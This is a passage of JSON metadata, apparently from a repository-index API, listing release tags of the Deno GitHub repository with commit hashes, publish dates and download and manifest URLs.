itHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts